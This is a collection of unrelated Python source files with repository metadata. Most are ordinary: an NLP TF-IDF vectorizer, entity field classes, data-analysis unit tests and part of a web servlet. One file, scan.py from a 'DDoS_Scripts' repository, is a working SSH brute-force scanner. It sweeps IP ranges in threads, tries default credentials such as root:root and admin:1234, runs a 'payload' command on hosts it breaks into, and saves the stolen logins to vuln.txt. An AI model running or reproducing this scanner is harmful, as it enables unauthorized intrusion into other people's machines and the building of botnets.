142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | null | null | null |
deeppavlov/models/vectorizers/hashing_tfidf_vectorizer.py
|
havesupper/DeepPavlov
|
142f9ff05d53e78bae77f6392613eccea0aa57f7
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2017 Neural Networks and Deep Learning lab, MIPT
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from collections import Counter
from typing import List, Any, Generator, Tuple, KeysView, ValuesView, Type, Dict
import scipy as sp
from scipy import sparse
import numpy as np
from sklearn.utils import murmurhash3_32
from deeppavlov.core.models.component import Component
from deeppavlov.core.models.serializable import Serializable
from deeppavlov.core.common.log import get_logger
from deeppavlov.core.common.registry import register
TOKENIZER = None
logger = get_logger(__name__)
def hash_(token, hash_size):
return murmurhash3_32(token, positive=True) % hash_size
@register('hashing_tfidf_vectorizer')
class HashingTfIdfVectorizer(Component, Serializable):
"""
Create a tfidf matrix from collection of documents.
"""
def __init__(self, tokenizer, hash_size=2 ** 24, doc_index: dict =None,
save_path: str = None, load_path: str = None, **kwargs):
"""
:param hash_size: a size of hash, power of 2
:param tokenizer: a tokenizer class
"""
super().__init__(save_path=save_path, load_path=load_path, mode=kwargs.get('mode', 'infer'))
self.hash_size = hash_size
self.tokenizer = tokenizer
self.term_freqs = None
self.doc_index = doc_index
global TOKENIZER
TOKENIZER = self.tokenizer
self.rows = []
self.cols = []
self.data = []
def __call__(self, questions: List[str]) -> sp.sparse.csr_matrix:
sp_tfidfs = []
for question in questions:
ngrams = list(self.tokenizer([question]))
hashes = [hash_(ngram, self.hash_size) for ngram in ngrams[0]]
hashes_unique, q_hashes = np.unique(hashes, return_counts=True)
tfs = np.log1p(q_hashes)
# TODO revise policy if len(q_hashes) == 0
if len(q_hashes) == 0:
return sp.sparse.csr_matrix((1, self.hash_size))
size = len(self.doc_index)
Ns = self.term_freqs[hashes_unique]
idfs = np.log((size - Ns + 0.5) / (Ns + 0.5))
idfs[idfs < 0] = 0
tfidf = np.multiply(tfs, idfs)
indptr = np.array([0, len(hashes_unique)])
sp_tfidf = sp.sparse.csr_matrix(
(tfidf, hashes_unique, indptr), shape=(1, self.hash_size)
)
sp_tfidfs.append(sp_tfidf)
transformed = sp.sparse.vstack(sp_tfidfs)
return transformed
def get_counts(self, docs: List[str], doc_ids: List[Any]) \
-> Generator[Tuple[KeysView, ValuesView, List[int]], Any, None]:
logger.info("Tokenizing batch...")
batch_ngrams = list(self.tokenizer(docs))
logger.info("Counting hash...")
doc_id = iter(doc_ids)
for ngrams in batch_ngrams:
counts = Counter([hash_(gram, self.hash_size) for gram in ngrams])
hashes = counts.keys()
values = counts.values()
_id = self.doc_index[next(doc_id)]
if values:
col_id = [_id] * len(values)
else:
col_id = []
yield hashes, values, col_id
def get_count_matrix(self, row: List[int], col: List[int], data: List[int], size) \
-> sp.sparse.csr_matrix:
count_matrix = sparse.csr_matrix((data, (row, col)), shape=(self.hash_size, size))
count_matrix.sum_duplicates()
return count_matrix
@staticmethod
def get_tfidf_matrix(count_matrix: sp.sparse.csr_matrix) -> Tuple[
sp.sparse.csr_matrix, np.array]:
"""Convert a word count matrix into a tfidf matrix."""
binary = (count_matrix > 0).astype(int)
term_freqs = np.array(binary.sum(1)).squeeze()
idfs = np.log((count_matrix.shape[1] - term_freqs + 0.5) / (term_freqs + 0.5))
idfs[idfs < 0] = 0
idfs = sp.sparse.diags(idfs, 0)
tfs = count_matrix.log1p()
tfidfs = idfs.dot(tfs)
return tfidfs, term_freqs
def fit_batch(self, docs, doc_ids) -> None:
for batch_rows, batch_data, batch_cols in self.get_counts(docs, doc_ids):
self.rows.extend(batch_rows)
self.cols.extend(batch_cols)
self.data.extend(batch_data)
def save(self) -> None:
logger.info("Saving tfidf matrix to {}".format(self.save_path))
count_matrix = self.get_count_matrix(self.rows, self.cols, self.data,
size=len(self.doc_index))
tfidf_matrix, term_freqs = self.get_tfidf_matrix(count_matrix)
self.term_freqs = term_freqs
opts = {'hash_size': self.hash_size,
'ngram_range': self.tokenizer.ngram_range,
'doc_index': self.doc_index,
'term_freqs': self.term_freqs}
data = {
'data': tfidf_matrix.data,
'indices': tfidf_matrix.indices,
'indptr': tfidf_matrix.indptr,
'shape': tfidf_matrix.shape,
'opts': opts
}
np.savez(self.save_path, **data)
# release memory
self.reset()
def reset(self):
self.rows.clear()
self.cols.clear()
self.data.clear()
def load(self) -> Tuple[sp.sparse.csr_matrix, Dict]:
# TODO implement loading from URL
logger.info("Loading tfidf matrix from {}".format(self.load_path))
loader = np.load(self.load_path)
matrix = sp.sparse.csr_matrix((loader['data'], loader['indices'],
loader['indptr']), shape=loader['shape'])
return matrix, loader['opts'].item(0)
| 35.045198
| 100
| 0.61841
|
4a0a4714139035a823bde16934e683809b56f444
| 22,066
|
py
|
Python
|
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | 1
|
2020-04-04T01:32:29.000Z
|
2020-04-04T01:32:29.000Z
|
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | null | null | null |
tools/efro/entity/_field.py
|
Awesome-Logic/ballistica
|
233a4a4f7840c9c666a1809626b6993a4b145349
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2011-2020 Eric Froemling
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# -----------------------------------------------------------------------------
"""Field types for the entity system."""
from __future__ import annotations
import copy
import logging
from typing import TYPE_CHECKING, Generic, TypeVar, overload
from efro.entity._support import (BaseField, BoundCompoundValue,
BoundListField, BoundDictField,
BoundCompoundListField,
BoundCompoundDictField)
from efro.entity.util import have_matching_fields
if TYPE_CHECKING:
from typing import Dict, Type, List, Any
from efro.entity._value import TypedValue, CompoundValue
T = TypeVar('T')
TK = TypeVar('TK')
TC = TypeVar('TC', bound='CompoundValue')
class Field(BaseField, Generic[T]):
"""Field consisting of a single value."""
def __init__(self,
d_key: str,
value: TypedValue[T],
store_default: bool = True) -> None:
super().__init__(d_key)
self.d_value = value
self._store_default = store_default
def __repr__(self) -> str:
return f'<Field "{self.d_key}" with {self.d_value}>'
def get_default_data(self) -> Any:
return self.d_value.get_default_data()
def filter_input(self, data: Any, error: bool) -> Any:
return self.d_value.filter_input(data, error)
def filter_output(self, data: Any) -> Any:
return self.d_value.filter_output(data)
def prune_data(self, data: Any) -> bool:
return self.d_value.prune_data(data)
if TYPE_CHECKING:
# Use default runtime get/set but let type-checker know our types.
# Note: we actually return a bound-field when accessed on
# a type instead of an instance, but we don't reflect that here yet
# (would need to write a mypy plugin so sub-field access works first)
@overload
def __get__(self, obj: None, cls: Any = None) -> Field[T]:
...
@overload
def __get__(self, obj: Any, cls: Any = None) -> T:
...
def __get__(self, obj: Any, cls: Any = None) -> Any:
...
def __set__(self, obj: Any, value: T) -> None:
...
class CompoundField(BaseField, Generic[TC]):
"""Field consisting of a single compound value."""
def __init__(self,
d_key: str,
value: TC,
store_default: bool = True) -> None:
super().__init__(d_key)
if __debug__:
from efro.entity._value import CompoundValue
assert isinstance(value, CompoundValue)
assert not hasattr(value, 'd_data')
self.d_value = value
self._store_default = store_default
def get_default_data(self) -> dict:
return self.d_value.get_default_data()
def filter_input(self, data: Any, error: bool) -> dict:
return self.d_value.filter_input(data, error)
def prune_data(self, data: Any) -> bool:
return self.d_value.prune_data(data)
# Note:
# Currently, to the type-checker we just return a simple instance
# of our CompoundValue so it can properly type-check access to its
# attrs. However at runtime we return a FieldInspector or
# BoundCompoundField which both use magic to provide the same attrs
# dynamically (but which the type-checker doesn't understand).
# Perhaps at some point we can write a mypy plugin to correct this.
if TYPE_CHECKING:
def __get__(self, obj: Any, cls: Any = None) -> TC:
...
# Theoretically this type-checking may be too tight;
# we can support assigning a parent class to a child class if
# their fields match. Not sure if that'll ever come up though;
# gonna leave this for now as I prefer to have *some* checking.
# Also once we get BoundCompoundValues working with mypy we'll
# need to accept those too.
def __set__(self: CompoundField[TC], obj: Any, value: TC) -> None:
...
def get_with_data(self, data: Any) -> Any:
assert self.d_key in data
return BoundCompoundValue(self.d_value, data[self.d_key])
def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
from efro.entity._value import CompoundValue
# Ok here's the deal: our type checking above allows any subtype
# of our CompoundValue in here, but we want to be more picky than
# that. Let's check fields for equality. This way we'll allow
# assigning something like a Carentity to a Car field
# (where the data is the same), but won't allow assigning a Car
# to a Vehicle field (as Car probably adds more fields).
value1: CompoundValue
if isinstance(value, BoundCompoundValue):
value1 = value.d_value
elif isinstance(value, CompoundValue):
value1 = value
else:
raise ValueError(f"Can't assign from object type {type(value)}")
dataval = getattr(value, 'd_data', None)
if dataval is None:
raise ValueError(f"Can't assign from unbound object {value}")
if self.d_value.get_fields() != value1.get_fields():
raise ValueError(f"Can't assign to {self.d_value} from"
f' incompatible type {value.d_value}; '
f'sub-fields do not match.')
# If we're allowing this to go through, we can simply copy the
# data from the passed in value. The fields match so it should
# be in a valid state already.
data[self.d_key] = copy.deepcopy(dataval)
class ListField(BaseField, Generic[T]):
"""Field consisting of repeated values."""
def __init__(self,
d_key: str,
value: TypedValue[T],
store_default: bool = True) -> None:
super().__init__(d_key)
self.d_value = value
self._store_default = store_default
def get_default_data(self) -> list:
return []
def filter_input(self, data: Any, error: bool) -> Any:
# If we were passed a BoundListField, operate on its raw values
if isinstance(data, BoundListField):
data = data.d_data
if not isinstance(data, list):
if error:
raise TypeError(f'list value expected; got {type(data)}')
logging.error('Ignoring non-list data for %s: %s', self, data)
data = []
for i, entry in enumerate(data):
data[i] = self.d_value.filter_input(entry, error=error)
return data
def prune_data(self, data: Any) -> bool:
# We never prune individual values since that would fundamentally
# change the list, but we can prune completely if empty (and allowed).
return not data and not self._store_default
# When accessed on a FieldInspector we return a sub-field FieldInspector.
# When accessed on an instance we return a BoundListField.
# noinspection DuplicatedCode
if TYPE_CHECKING:
# Access via type gives our field; via an instance gives a bound field.
@overload
def __get__(self, obj: None, cls: Any = None) -> ListField[T]:
...
@overload
def __get__(self, obj: Any, cls: Any = None) -> BoundListField[T]:
...
def __get__(self, obj: Any, cls: Any = None) -> Any:
...
# Allow setting via a raw value list or a bound list field
@overload
def __set__(self, obj: Any, value: List[T]) -> None:
...
@overload
def __set__(self, obj: Any, value: BoundListField[T]) -> None:
...
def __set__(self, obj: Any, value: Any) -> None:
...
def get_with_data(self, data: Any) -> Any:
return BoundListField(self, data[self.d_key])
class DictField(BaseField, Generic[TK, T]):
"""A field of values in a dict with a specified index type."""
def __init__(self,
d_key: str,
keytype: Type[TK],
field: TypedValue[T],
store_default: bool = True) -> None:
super().__init__(d_key)
self.d_value = field
self._store_default = store_default
self._keytype = keytype
def get_default_data(self) -> dict:
return {}
# noinspection DuplicatedCode
def filter_input(self, data: Any, error: bool) -> Any:
# If we were passed a BoundDictField, operate on its raw values
if isinstance(data, BoundDictField):
data = data.d_data
if not isinstance(data, dict):
if error:
raise TypeError('dict value expected')
logging.error('Ignoring non-dict data for %s: %s', self, data)
data = {}
data_out = {}
for key, val in data.items():
if not isinstance(key, self._keytype):
if error:
raise TypeError('invalid key type')
logging.error('Ignoring invalid key type for %s: %s', self,
data)
continue
data_out[key] = self.d_value.filter_input(val, error=error)
return data_out
def prune_data(self, data: Any) -> bool:
# We never prune individual values since that would fundamentally
# change the dict, but we can prune completely if empty (and allowed)
return not data and not self._store_default
# noinspection DuplicatedCode
if TYPE_CHECKING:
# Return our field if accessed via type and bound-dict-field
# if via instance.
@overload
def __get__(self, obj: None, cls: Any = None) -> DictField[TK, T]:
...
@overload
def __get__(self, obj: Any, cls: Any = None) -> BoundDictField[TK, T]:
...
def __get__(self, obj: Any, cls: Any = None) -> Any:
...
# Allow setting via matching dict values or BoundDictFields
@overload
def __set__(self, obj: Any, value: Dict[TK, T]) -> None:
...
@overload
def __set__(self, obj: Any, value: BoundDictField[TK, T]) -> None:
...
def __set__(self, obj: Any, value: Any) -> None:
...
def get_with_data(self, data: Any) -> Any:
return BoundDictField(self._keytype, self, data[self.d_key])
class CompoundListField(BaseField, Generic[TC]):
"""A field consisting of repeated instances of a compound-value.
Element access returns the sub-field, allowing nested field access.
ie: mylist[10].fieldattr = 'foo'
"""
def __init__(self,
d_key: str,
valuetype: TC,
store_default: bool = True) -> None:
super().__init__(d_key)
self.d_value = valuetype
# This doesnt actually exist for us, but want the type-checker
# to think it does (see TYPE_CHECKING note below).
self.d_data: Any
self._store_default = store_default
def filter_input(self, data: Any, error: bool) -> list:
if not isinstance(data, list):
if error:
raise TypeError('list value expected')
logging.error('Ignoring non-list data for %s: %s', self, data)
data = []
assert isinstance(data, list)
# Ok we've got a list; now run everything in it through validation.
for i, subdata in enumerate(data):
data[i] = self.d_value.filter_input(subdata, error=error)
return data
def get_default_data(self) -> list:
return []
def prune_data(self, data: Any) -> bool:
# Run pruning on all individual entries' data through out child field.
# However we don't *completely* prune values from the list since that
# would change it.
for subdata in data:
self.d_value.prune_fields_data(subdata)
# We can also optionally prune the whole list if empty and allowed.
return not data and not self._store_default
# noinspection DuplicatedCode
if TYPE_CHECKING:
@overload
def __get__(self, obj: None, cls: Any = None) -> CompoundListField[TC]:
...
@overload
def __get__(self,
obj: Any,
cls: Any = None) -> BoundCompoundListField[TC]:
...
def __get__(self, obj: Any, cls: Any = None) -> Any:
...
# Note:
# When setting the list, we tell the type-checker that we also accept
# a raw list of CompoundValue objects, but at runtime we actually
# always deal with BoundCompoundValue objects (see note in
# BoundCompoundListField for why we accept CompoundValue objs)
@overload
def __set__(self, obj: Any, value: List[TC]) -> None:
...
@overload
def __set__(self, obj: Any, value: BoundCompoundListField[TC]) -> None:
...
def __set__(self, obj: Any, value: Any) -> None:
...
def get_with_data(self, data: Any) -> Any:
assert self.d_key in data
return BoundCompoundListField(self, data[self.d_key])
def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
# If we were passed a BoundCompoundListField,
# simply convert it to a flat list of BoundCompoundValue objects which
# is what we work with natively here.
if isinstance(value, BoundCompoundListField):
value = list(value)
if not isinstance(value, list):
raise TypeError(f'CompoundListField expected list value on set;'
f' got {type(value)}.')
# Allow assigning only from a sequence of our existing children.
# (could look into expanding this to other children if we can
# be sure the underlying data will line up; for example two
# CompoundListFields with different child_field values should not
# be inter-assignable.
if not all(isinstance(i, BoundCompoundValue) for i in value):
raise ValueError('CompoundListField assignment must be a '
'list containing only BoundCompoundValue objs.')
# Make sure the data all has the same CompoundValue type and
# compare that type against ours once to make sure its fields match.
# (this will not allow passing CompoundValues from multiple sources
# but I don't know if that would ever come up..)
for i, val in enumerate(value):
if i == 0:
# Do the full field comparison on the first value only..
if not have_matching_fields(val.d_value, self.d_value):
raise ValueError(
'CompoundListField assignment must be a '
'list containing matching CompoundValues.')
else:
# For all remaining values, just ensure they match the first.
if val.d_value is not value[0].d_value:
raise ValueError(
'CompoundListField assignment cannot contain '
'multiple CompoundValue types as sources.')
data[self.d_key] = self.filter_input([i.d_data for i in value],
error=error)
class CompoundDictField(BaseField, Generic[TK, TC]):
"""A field consisting of key-indexed instances of a compound-value.
Element access returns the sub-field, allowing nested field access.
ie: mylist[10].fieldattr = 'foo'
"""
def __init__(self,
d_key: str,
keytype: Type[TK],
valuetype: TC,
store_default: bool = True) -> None:
super().__init__(d_key)
self.d_value = valuetype
# This doesnt actually exist for us, but want the type-checker
# to think it does (see TYPE_CHECKING note below).
self.d_data: Any
self.d_keytype = keytype
self._store_default = store_default
# noinspection DuplicatedCode
def filter_input(self, data: Any, error: bool) -> dict:
if not isinstance(data, dict):
if error:
raise TypeError('dict value expected')
logging.error('Ignoring non-dict data for %s: %s', self, data)
data = {}
data_out = {}
for key, val in data.items():
if not isinstance(key, self.d_keytype):
if error:
raise TypeError('invalid key type')
logging.error('Ignoring invalid key type for %s: %s', self,
data)
continue
data_out[key] = self.d_value.filter_input(val, error=error)
return data_out
def get_default_data(self) -> dict:
return {}
def prune_data(self, data: Any) -> bool:
# Run pruning on all individual entries' data through our child field.
# However we don't *completely* prune values from the list since that
# would change it.
for subdata in data.values():
self.d_value.prune_fields_data(subdata)
# We can also optionally prune the whole list if empty and allowed.
return not data and not self._store_default
# ONLY overriding these in type-checker land to clarify types.
# (see note in BaseField)
# noinspection DuplicatedCode
if TYPE_CHECKING:
@overload
def __get__(self,
obj: None,
cls: Any = None) -> CompoundDictField[TK, TC]:
...
@overload
def __get__(self,
obj: Any,
cls: Any = None) -> BoundCompoundDictField[TK, TC]:
...
def __get__(self, obj: Any, cls: Any = None) -> Any:
...
# Note:
# When setting the dict, we tell the type-checker that we also accept
# a raw dict of CompoundValue objects, but at runtime we actually
# always deal with BoundCompoundValue objects (see note in
# BoundCompoundDictField for why we accept CompoundValue objs)
@overload
def __set__(self, obj: Any, value: Dict[TK, TC]) -> None:
...
@overload
def __set__(self, obj: Any, value: BoundCompoundDictField[TK,
TC]) -> None:
...
def __set__(self, obj: Any, value: Any) -> None:
...
def get_with_data(self, data: Any) -> Any:
assert self.d_key in data
return BoundCompoundDictField(self, data[self.d_key])
def set_with_data(self, data: Any, value: Any, error: bool) -> Any:
# If we were passed a BoundCompoundDictField,
# simply convert it to a flat dict of BoundCompoundValue objects which
# is what we work with natively here.
if isinstance(value, BoundCompoundDictField):
value = dict(value.items())
if not isinstance(value, dict):
raise TypeError('CompoundDictField expected dict value on set.')
# Allow assigning only from a sequence of our existing children.
# (could look into expanding this to other children if we can
# be sure the underlying data will line up; for example two
# CompoundListFields with different child_field values should not
# be inter-assignable.
if (not all(isinstance(i, BoundCompoundValue)
for i in value.values())):
raise ValueError('CompoundDictField assignment must be a '
'dict containing only BoundCompoundValues.')
# Make sure the data all has the same CompoundValue type and
# compare that type against ours once to make sure its fields match.
# (this will not allow passing CompoundValues from multiple sources
# but I don't know if that would ever come up..)
first_value: Any = None
for i, val in enumerate(value.values()):
if i == 0:
first_value = val.d_value
# Do the full field comparison on the first value only..
if not have_matching_fields(val.d_value, self.d_value):
raise ValueError(
'CompoundListField assignment must be a '
'list containing matching CompoundValues.')
else:
# For all remaining values, just ensure they match the first.
if val.d_value is not first_value:
raise ValueError(
'CompoundListField assignment cannot contain '
'multiple CompoundValue types as sources.')
data[self.d_key] = self.filter_input(
{key: val.d_data
for key, val in value.items()}, error=error)
| 38.309028
| 79
| 0.598704
|
4a0a4755c849160343f0d27df0aa86b46ee30b5e
| 4,349
|
py
|
Python
|
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
CytoPy/tests/test_flow/test_utilities.py
|
fabbondanza/CytoPy
|
74baea59cfe9e9f664b6b1bf7abf9847f34893eb
|
[
"MIT"
] | null | null | null |
import sys
sys.path.append('/home/ross/CytoPy')
from CytoPy.data.mongo_setup import global_init
from CytoPy.flow.gating import utilities
from CytoPy.tests import make_example_date
from sklearn.neighbors import KernelDensity
from scipy.signal import find_peaks
from itertools import combinations
import numpy as np
import pandas as pd
import unittest
global_init('test')
class TestCheckPeak(unittest.TestCase):
def test(self):
probs = np.array([0, 0, 0, 0.05, 0, 0, 2, 0, 0, 3, 0, 0, 0.05])
peaks = np.where(np.array(probs) > 0)[0]
self.assertEqual(len(utilities.check_peak(peaks, probs, t=0.5)), 2)
self.assertEqual(len(utilities.check_peak(peaks, probs, t=0.1)), 2)
self.assertEqual(len(utilities.check_peak(peaks, probs, t=0.01)), 4)
class TestFindLocalMinima(unittest.TestCase):
@staticmethod
def _build():
data = make_example_date()
data = pd.concat([data[data.blobID != 2],
data[data.blobID == 2].sample(frac=0.25)])
d = data['feature0'].values
density = KernelDensity(bandwidth=0.5, kernel='gaussian')
density.fit(d[:, None])
x_d = np.linspace(min(d), max(d), 1000)
prob = np.exp(density.score_samples(x_d[:, None]))
peaks = find_peaks(prob)[0]
return prob, peaks, x_d
def test(self):
prob, peaks, x_d = self._build()
threshold = utilities.find_local_minima(prob, x_d, peaks)
self.assertTrue(0.58 <= threshold <= 0.6)
class TestInsideEllipse(unittest.TestCase):
@staticmethod
def _build():
data = make_example_date()
mask = utilities.inside_ellipse(data[['feature0', 'feature1']].values,
center=(4.5, 2.5),
width=2.3,
height=3,
angle=0)
return data, mask
def test(self):
data, mask = self._build()
correct = all(x == 1 for x in data.loc[mask].blobID.values)
self.assertTrue(correct)
class TestRectangularFilter(unittest.TestCase):
def test(self):
data = make_example_date()
rect = dict(xmin=0, xmax=8, ymin=-2.5, ymax=6.0)
self.assertTrue(all(x == 1 for x in utilities.rectangular_filter(data,
x='feature0',
y='feature1',
definition=rect).blobID.values))
class TestDensityDependentDownsample(unittest.TestCase):
@staticmethod
def _equal_ratio(data, samples):
ratios = [data[data.blobID == x[0]].shape[0] / data[data.blobID == x[1]].shape[0]
for x in combinations(samples.blobID.unique(), 2)]
return combinations(ratios, 2)
def test(self):
data = make_example_date(n_samples=10000)
samples = utilities.density_dependent_downsample(data=data,
features=['feature0', 'feature1'],
mmd_sample_n=2000)
for x, y in self._equal_ratio(data, samples):
self.assertAlmostEqual(x, y, places=1)
class TestGetParams(unittest.TestCase):
class MakeshiftClass:
def __init__(self, a, b, c, d='test', **kwargs):
pass
def test_basic(self):
self.assertListEqual(utilities.get_params(self.MakeshiftClass),
['a', 'b', 'c', 'd'])
def include_kwargs(self):
self.assertListEqual(utilities.get_params(self.MakeshiftClass, exclude_kwargs=False),
['a', 'b', 'c', 'd', 'kwargs'])
def test_requied_only(self):
self.assertListEqual(utilities.get_params(self.MakeshiftClass, required_only=True),
['a', 'b', 'c'])
def test_required_only_exclude_kwargs(self):
self.assertListEqual(utilities.get_params(self.MakeshiftClass,
required_only=True,
exclude_kwargs=True),
['a', 'b', 'c'])
if __name__ == '__main__':
unittest.main()
| 38.149123
| 105
| 0.551391
|
4a0a4772da8fe89c13bbcea10e9223aa128769d6
| 4,931
|
py
|
Python
|
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | 2
|
2020-05-26T12:51:01.000Z
|
2021-12-24T01:27:52.000Z
|
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | null | null | null |
DDoS_Scripts/scan.py
|
thexaoulm/dos
|
fd8a3bc623e7615df062edde34e5972a0545d668
|
[
"MIT"
] | 1
|
2021-10-10T03:45:08.000Z
|
2021-10-10T03:45:08.000Z
|
# Voids hacka scanna
# nano /usr/include/bits/typesizes.h -> change 99999 to 99999
# ulimit -n 99999
# python scan.py 1000 <start-range> <end-range>
import threading, paramiko, random, socket, time, sys
paramiko.util.log_to_file("/dev/null")
server_ip = "208.67.1.26"
blacklisted = ["127.0","10.0","192.168"]
passwords = ["admin:1234"]
if sys.argv[4] == "root":
passwords = ["root:root"]
if sys.argv[4] == "guest":
passwords = ["guest:guest"]
if sys.argv[4] == "telnet":
passwords = ["telnet:telnet"]
if len(sys.argv) < 4:
sys.exit("Usage: python " + sys.argv[0] + " <threads> <start-range> <end-range> <passwords>")
print """\n\x1b[0;37m******************************
* \x1b[0;31mSCANNER STARTING\x1b[0;37m *
******************************\x1b[0m"""
def sshscanner(ip):
global passwords
try:
thisipisbad='no'
for badip in blacklisted:
if badip in ip:
thisipisbad='yes'
if thisipisbad=='yes':
sys.exit()
username='root'
password="0"
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((ip, port))
data = str(s.recv(99999))
if "SSH" in data:
print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
elif "ssh" in data:
print("\x1b[0;33m[-] SSH Open On -> " + ip + "\x1b[37m")
else:
sys.exit()
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in passwords:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(ip, port = port, username=username, password=password, timeout=3)
break
except:
pass
badserver=True
stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig")
output = stdout.read()
if "inet addr" in output:
badserver=False
websites = [ ]
if badserver == False:
print("\x1b[0;32m[+] Executing Payload -> " + ip + ":" + username + ":" + password + "\x1b[37m")
ssh.exec_command("")
vulns = open("vuln.txt", "a").write(username + ":" + password + ":" + ip + "\n")
time.sleep(12)
ssh.close()
except Exception as e:
pass
if sys.argv[2] == "LUCKY":
ranges = ["122.3.0.0/122.3.255.255", "122.52.0.0/122.54.255.255", "124.83.0.0/124.83.255.255", "124.105.0.0/124.107.255.255"]
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
if sys.argv[2] != "LUCKY":
a = int(sys.argv[2].split(".")[0])
b = int(sys.argv[2].split(".")[1])
c = int(sys.argv[2].split(".")[2])
d = int(sys.argv[2].split(".")[3])
else:
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
x = 0
while(True):
try:
if sys.argv[2] != "LUCKY":
endaddr = sys.argv[3]
else:
endaddr = endrng
d += 1
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if endaddr == (ipaddr or str(a) + "." + str(b) + "."+str(c)+"."+str(d-1)):
if sys.argv[2] == "LUCKY":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if d > 255:
c += 1
d = 0
if c > 255:
b += 1
c = 0
if b > 255:
a += 1
b = 0
ipaddr = str(a) + "." + str(b) + "."+str(c)+"."+str(d)
if ipaddr == endaddr:
if sys.argv[2] == "LUCKY":
randomrange = random.choice(ranges)
startrng = randomrange.split("/")[0]
endrng = randomrange.split("/")[1]
a = int(startrng.split(".")[0])
b = int(startrng.split(".")[1])
c = int(startrng.split(".")[2])
d = int(startrng.split(".")[3])
else:
break
if x > 500:
time.sleep(1)
x = 0
t = threading.Thread(target=sshscanner, args=(ipaddr,))
t.start()
except Exception as e:
pass
print "\x1b[37mDone\x1b[37m"
| 29.884848
| 129
| 0.468262
|
4a0a47dc486ca8d88586c1ba8b81d1a0db242f24
| 3,955
|
py
|
Python
|
appengine/monorail/sitewide/hostinghome.py
|
xswz8015/infra
|
f956b78ce4c39cc76acdda47601b86794ae0c1ba
|
[
"BSD-3-Clause"
] | null | null | null |
appengine/monorail/sitewide/hostinghome.py
|
xswz8015/infra
|
f956b78ce4c39cc76acdda47601b86794ae0c1ba
|
[
"BSD-3-Clause"
] | 7
|
2022-02-15T01:11:37.000Z
|
2022-03-02T12:46:13.000Z
|
appengine/monorail/sitewide/hostinghome.py
|
NDevTK/chromium-infra
|
d38e088e158d81f7f2065a38aa1ea1894f735ec4
|
[
"BSD-3-Clause"
] | null | null | null |
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""A class to display the hosting home page."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import logging
import ezt
import settings
from businesslogic import work_env
from framework import exceptions
from framework import permissions
from framework import servlet
from framework import template_helpers
from framework import urls
from project import project_views
from sitewide import projectsearch
from sitewide import sitewide_helpers
class HostingHome(servlet.Servlet):
"""HostingHome shows the project list and link to create a project."""
_PAGE_TEMPLATE = 'sitewide/hosting-home-page.ezt'
def GatherPageData(self, mr):
"""Build up a dictionary of data values to use when rendering the page.
Args:
mr: commonly used info parsed from the request.
Returns:
Dict of values used by EZT for rendering the page.
"""
redirect_msg = self._MaybeRedirectToDomainDefaultProject(mr)
logging.info(redirect_msg)
can_create_project = permissions.CanCreateProject(mr.perms)
# Kick off the search pipeline, it has its own promises for parallelism.
pipeline = projectsearch.ProjectSearchPipeline(mr, self.services)
# Meanwhile, determine which projects the signed-in user has starred.
with work_env.WorkEnv(mr, self.services) as we:
starred_projects = we.ListStarredProjects()
